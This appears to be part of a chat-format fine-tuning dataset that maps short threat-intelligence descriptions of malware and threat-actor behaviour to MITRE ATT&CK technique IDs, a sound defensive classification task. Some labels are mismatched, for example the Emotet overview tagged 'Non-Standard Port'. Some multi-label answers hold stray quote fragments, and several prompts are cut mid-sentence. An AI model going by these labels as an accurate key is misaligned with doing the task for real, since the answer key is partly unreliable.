- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SPACESHIP copies staged data to removable drives when they are inserted into the system."
- },
- {
- "role": "assistant",
- "content": "T1052.001 - Exfiltration over USB"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Proxysvc lists processes running on the system."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MacMa can collect then exfiltrate files from the compromised system."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emotet is one of the most widely distributed and actively developed malware families on the crimeware landscape today. Emotet began purely as a banking trojan, but over the years, has continued to evolve and more recently, has been associated with some larger-scale targeted Ryuk ransomware infections. Emotet is commonly delivered via both macro-laden office documents, as well as URL-based spam messages that lead to an eventual infection. It's not uncommon to see Emotet reuse of some of the command and control (C2) servers over more extended periods. The goal of Emotet, as is the case with crimeware-based threats, is monetary. Attackers use Emotet to deliver modular payloads it can use to monetize infections"
- },
- {
- "role": "assistant",
- "content": "T1571 - Non-Standard Port"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Leveraging Existing Windows Services to Deliver Malware Windows Management Instrumentation Console (WMIC) provides a command line interface to WMI"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "When loaded with startup command 2, the installer can copy the original explorer.exe file inside its current running directory and rename d3d9.dll to uxtheme.dll. In this case the persistence is achieved by loading the original explorer.exe from its startup location and, using DLL side-loading, passing the execution control to the stage 4 malware (discussed in next section"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chimera has utilized multiple commands to identify data of interest in file and directory listings."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The threat actor in this case hosted the MSI file on GitHub using a spoofed file extension to look like a PDF"
- },
- {
- "role": "assistant",
- "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hydraq creates a backdoor through which remote attackers can delete files."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One variant of creates a new service using either a hard-coded or randomly generated name."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The payload is stored in a hidden directory at /Users/Shared/.local/kextd."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon obtains the target's IP address and local network segment."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A tool can read and decrypt stored Registry values."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can disarm Windows Defender during the UAC process to evade detection."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Attor has a plugin that enumerates files with specific extensions on all hard disk drives and stores file information in encrypted log files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can use TCP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BITSAdmin is a command-line tool that you can use to create download or upload jobs and monitor their progress. For full, comprehensive documentation of the tool and all of its commands, see bitsadmin and bitsadmin examples in the Windows IT Pro Center"
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Empire has the ability to gather browser data such as bookmarks and visited sites."
- },
- {
- "role": "assistant",
- "content": "T1217 - Browser Bookmark Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lucifer can download and execute a replica of itself using certutil."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UNC2452 used the service control manager on a remote system to disable services associated with security monitoring products."
- },
- {
- "role": "assistant",
- "content": "T1562.001 - Impair Defenses: Disable or Modify Tools"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation CuckooBees, the threat actors used `ipconfig`, `nbtstat`, `tracert`, `route print`, and `cat /etc/hosts` commands."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CORESHELL is installed via execution of rundll32 with an export named \"init\" or \"InitW.\""
- },
- {
- "role": "assistant",
- "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The loader’s main goal was to run a PowerShell command to execute shellcode"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Psylo has commands to enumerate all storage devices and to find all files that start with a particular string."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowGoop can use a modified Base64 encoding mechanism to send data to and from the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1132.002 - Non-Standard Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Trojan.Karagany can capture keystrokes on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "obfuscated scripts that were used on victim machines."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TAINTEDSCRIBE can delete files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SeaDuke has been packed with the UPX packer."
- },
- {
- "role": "assistant",
- "content": "T1027.002 - Obfuscated Files or Information: Software Packing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kessel can exfiltrate credentials and other information via HTTP POST request, TCP, and DNS."
- },
- {
- "role": "assistant",
- "content": "T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Winnti for Windows sets its DLL file as a new service in the Registry to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShellTea utilizes a number of techniques to identify if it is running within a virtual environment or is being monitored."
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks', 'T1497 - Virtualization/Sandbox Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors used a legitimate Windows executable and secure directory for their payloads to bypass UAC."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can download files from remote servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used legitimate local admin account credentials."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldMax has decoded and decrypted the configuration file when executed."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FoggyWeb can be disguised as a Visual Studio file such as `Windows.Data.TimeZones.zh-PH.pri` to evade detection. Also, FoggyWeb's loader can mimic a genuine `dll` file that carries out the same import functions as the legitimate Windows `version.dll` file."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can capture the victim's screen."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT18 establishes persistence via the \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" key."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Night Dragon used privately developed and customized remote access tools."
- },
- {
- "role": "assistant",
- "content": "T1587.001 - Malware"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "used an HTTP malware variant and a Port 22 malware variant to collect the victim’s username."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BitPaymer can use \"net view\" to discover remote systems."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Along with the change to using a DLL, Qbot also changed where it stores configuration information on the infected host. Earlier versions of Qbot stored this data within a DAT file in the same randomly named folder as the malicious binary. As of late 2020, this data is now stored in the registry, under a randomly named subkey under HKCU\\Software\\Microsoft. While this move to the registry keeps things a bit more hidden from prying eyes, in both cases the presence of a randomly named value under the Microsoft folder/key should be cause to investigate"
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has use `mshta` to execute malicious scripts on a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1218.005 - Signed Binary Proxy Execution: Mshta"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "browser history from Firefox, Google Chrome, Microsoft Edge and Internet Explorer; - usernames and passwords stored in the listed browsers; - email accounts from Microsoft Outlook and Mozilla Thunderbird"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers', 'T1087.003 - Email Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Carbanak searches recursively for Outlook personal storage tables (PST) files within user directories and sends them back to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1114.001 - Email Collection: Local Email Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BISCUIT has a command to launch a command shell on the system."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PoshC2 contains modules that allow for use of proxies in command and control."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Lazarus Group has hosted custom and open-source tools on compromised as well as Lazarus Group-controlled servers."
- },
- {
- "role": "assistant",
- "content": "T1608.002 - Upload Tool"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. The emails contained variations of Microsoft Word documents with embedded macros that, when enabled, downloaded and executed a malicious downloader that we refer to as PUNCHBUGGY"
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "An attacker sends an e-mail with a malicious Tar archive attached."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment', 'T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. R88.sh\" is a shell script that installs a cron job and attempts to download \"lowerv2.sh\" or \"rootv2.sh. Based on the config file it uses, it appears to be the Monero Silent Miner. Advertising for the miner promotes it as offering startup registry key persistence, mining only while idle, and the ability to inject the miner into \"Windows processes to bypass firewalls. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. Both Iron and Rocke's malware behave similarly, and reach out to similar infrastructure"
- },
- {
- "role": "assistant",
- "content": "T1059.004 - Command and Scripting Interpreter: Bash"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has disguised services to appear as benign software or related to operating system functions."
- },
- {
- "role": "assistant",
- "content": "T1036.004 - Masquerading: Masquerade Task or Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Clambling can register itself as a system service to gain persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Backdoor.Oldrea collects the current username from the victim."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LockerGoga has been observed shutting down infected systems."
- },
- {
- "role": "assistant",
- "content": "T1529 - System Shutdown/Reboot"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRatReporter used LZ compression to compress initial reconnaissance reports before sending to the C2."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Raspberry Robin leverages rundll32.exe followed by shell32.dll and calls the ShellExec_RunDLL or ShellExec_RunDLLA functions to execute the DLL via the processes such as odbcconf.exe, msiexec.exe and control.exe."
- },
- {
- "role": "assistant",
- "content": "T1218.008 - Signed Binary Proxy Execution: Odbcconf', 'T1218.007 - Signed Binary Proxy Execution: Msiexec', 'T1218.002 - Signed Binary Proxy Execution: Control Panel', 'T1218.011 - Signed Binary Proxy Execution: Rundll32"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A tool can use WMI to execute a binary."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Caterpillar WebShell has a module to perform brute force attacks on a system."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the command ‘file /bin/pwd’, which may have achieved two objectives for APT41. Second, it may return architecture-related information that would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step"
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Finally, the command: system_profiler SPHardwareDataType 2>/dev/null || awk ‘/Boot ROM Version/ {split($0, line, “:”);printf(“%s”, line[2]);} checks if the machine is one of the following: “MBP”, “MBA”, “MB”, “MM”, “IM”, “MP” and “XS”. These codes represent the model of the system. For instance, “MBP” stands for MacBook Pro, “MBA” stands for MacBook Air and so on"
- },
- {
- "role": "assistant",
- "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Some strings in are obfuscated with XOR x56."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PlugX can modify the characteristics of folders to hide them from the compromised user."
- },
- {
- "role": "assistant",
- "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AgentTesla is a .Net-based infostealer that has the capability to steal data from different applications on victim machines, such as browsers, FTP clients, and file downloaders. One of the new modules that has been added to this malware is the capability to steal WiFi profiles"
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 3 Password handover form displayed after credential theft The infrastructure used in these credential harvesting attacks used the domain 0utl00k[.]net, which at the time of the attacks resolved to 107.175.150[.]113 and 195.154.41[.]150"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Remcos can add itself to the Registry key \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "identifies files matching certain file extension and copies them to subdirectories it created."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One unique and fairly recent variant is a plain downloader that follows a similar convention to the aforementioned MarkiRAT implants. It also leverages MFC and embeds its logic within a CDialog class, getting executed upon initiation of an MFC dialog object during runtime. The use of this sample diverges from those used by the group in the past, where the payload was dropped by the malware itself, suggesting that the group might be in the process of changing some of its TTPs"
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bumblebee can enumerate the OS version and domain on a targeted system."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Deleted File created by vmtoolsd.exe and executed by vmtoolsd.exe child process."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
